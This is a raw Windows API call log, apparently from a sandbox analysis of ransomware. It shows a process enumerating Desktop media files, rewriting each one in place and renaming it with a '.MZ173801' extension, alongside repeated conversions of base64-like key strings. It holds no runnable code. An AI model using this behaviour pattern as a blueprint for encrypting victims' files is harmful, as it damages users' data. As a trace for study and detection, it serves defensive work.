lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.232] GetCurrentThreadId () returned 0x1358 [0123.232] GetCurrentThreadId () returned 0x1358 [0123.232] GetCurrentThreadId () returned 0x1358 [0123.232] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.232] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.232] GetCurrentThreadId () returned 0x1358 [0123.232] GetCurrentThreadId () returned 0x1358 [0123.232] GetCurrentThreadId () returned 0x1358 [0123.232] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\o_sfpnC-AoY-JO.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\o_sfpnc-aoy-jo.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.232] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.233] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.233] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x18631 [0123.233] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.233] ReadFile (in: hFile=0x410, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x18631, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f9b0*=0x18631, lpOverlapped=0x0) returned 1 [0123.234] CloseHandle (hObject=0x410) returned 1 [0123.236] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\o_sfpnC-AoY-JO.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\o_sfpnc-aoy-jo.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.237] WriteFile (in: hFile=0x410, lpBuffer=0x23be7d0*, nNumberOfBytesToWrite=0x18631, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23be7d0*, lpNumberOfBytesWritten=0x19f9bc*=0x18631, lpOverlapped=0x0) returned 1 [0123.239] CloseHandle (hObject=0x410) returned 1 [0123.239] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\o_sfpnC-AoY-JO.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\o_sfpnc-aoy-jo.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\o_sfpnC-AoY-JO.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\o_sfpnc-aoy-jo.wav.mz173801")) returned 1 [0123.240] GetCurrentThreadId () returned 0x1358 [0123.240] GetCurrentThreadId () returned 0x1358 [0123.240] GetCurrentThreadId () returned 0x1358 [0123.240] GetCurrentThreadId () returned 0x1358 [0123.240] GetCurrentThreadId () returned 0x1358 [0123.240] GetCurrentThreadId () returned 0x1358 [0123.240] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf11302e0, ftCreationTime.dwHighDateTime=0x1d5e88f, ftLastAccessTime.dwLowDateTime=0x8cb4c480, ftLastAccessTime.dwHighDateTime=0x1d5e837, ftLastWriteTime.dwLowDateTime=0x8cb4c480, ftLastWriteTime.dwHighDateTime=0x1d5e837, nFileSizeHigh=0x0, nFileSizeLow=0x18800, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="pZLG.mp4", cAlternateFileName="")) returned 1 [0123.240] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.240] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.240] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\pZLG.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\pzlg.mp4"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf11302e0, ftCreationTime.dwHighDateTime=0x1d5e88f, ftLastAccessTime.dwLowDateTime=0x8cb4c480, ftLastAccessTime.dwHighDateTime=0x1d5e837, ftLastWriteTime.dwLowDateTime=0x8cb4c480, ftLastWriteTime.dwHighDateTime=0x1d5e837, nFileSizeHigh=0x0, nFileSizeLow=0x18800)) returned 1 [0123.240] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.240] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0123.241] GetCurrentThreadId () returned 0x1358 [0123.241] GetCurrentThreadId () returned 0x1358 [0123.241] GetCurrentThreadId () returned 0x1358 [0123.241] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0123.241] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0123.241] GetCurrentThreadId () returned 0x1358 [0123.242] GetCurrentThreadId () returned 0x1358 [0123.242] GetCurrentThreadId () returned 0x1358 [0123.242] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\pZLG.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\pzlg.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.242] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0123.242] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.242] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x18800 [0123.242] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0123.242] ReadFile (in: hFile=0x410, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x18800, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f9b0*=0x18800, lpOverlapped=0x0) returned 1 [0123.243] CloseHandle (hObject=0x410) returned 1 [0123.245] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\pZLG.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\pzlg.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0123.246] WriteFile (in: hFile=0x410, lpBuffer=0x23be7d0*, nNumberOfBytesToWrite=0x18800, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23be7d0*, lpNumberOfBytesWritten=0x19f9bc*=0x18800, lpOverlapped=0x0) returned 1 [0123.249] CloseHandle (hObject=0x410) returned 1 [0123.249] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\pZLG.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\pzlg.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\pZLG.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\pzlg.mp4.mz173801")) returned 1 [0123.249] GetCurrentThreadId () returned 0x1358 [0123.249] GetCurrentThreadId () returned 0x1358 [0123.249] GetCurrentThreadId () returned 0x1358 [0123.249] GetCurrentThreadId () returned 0x1358 [0123.249] GetCurrentThreadId () returned 0x1358 [0123.249] GetCurrentThreadId () returned 0x1358 [0123.249] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2398d600, ftCreationTime.dwHighDateTime=0x1d5ef3d, ftLastAccessTime.dwLowDateTime=0xa2181a40, ftLastAccessTime.dwHighDateTime=0x1d5f0f5, ftLastWriteTime.dwLowDateTime=0xa2181a40, ftLastWriteTime.dwHighDateTime=0x1d5f0f5, nFileSizeHigh=0x0, nFileSizeLow=0x14fce, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="qgnj.wav", cAlternateFileName="")) returned 1 [0123.249] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0123.250] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0123.250] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\qgnj.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\qgnj.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2398d600, ftCreationTime.dwHighDateTime=0x1d5ef3d, ftLastAccessTime.dwLowDateTime=0xa2181a40, ftLastAccessTime.dwHighDateTime=0x1d5f0f5, ftLastWriteTime.dwLowDateTime=0xa2181a40, ftLastWriteTime.dwHighDateTime=0x1d5f0f5, nFileSizeHigh=0x0, nFileSizeLow=0x14fce)) returned 1 [0123.250] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 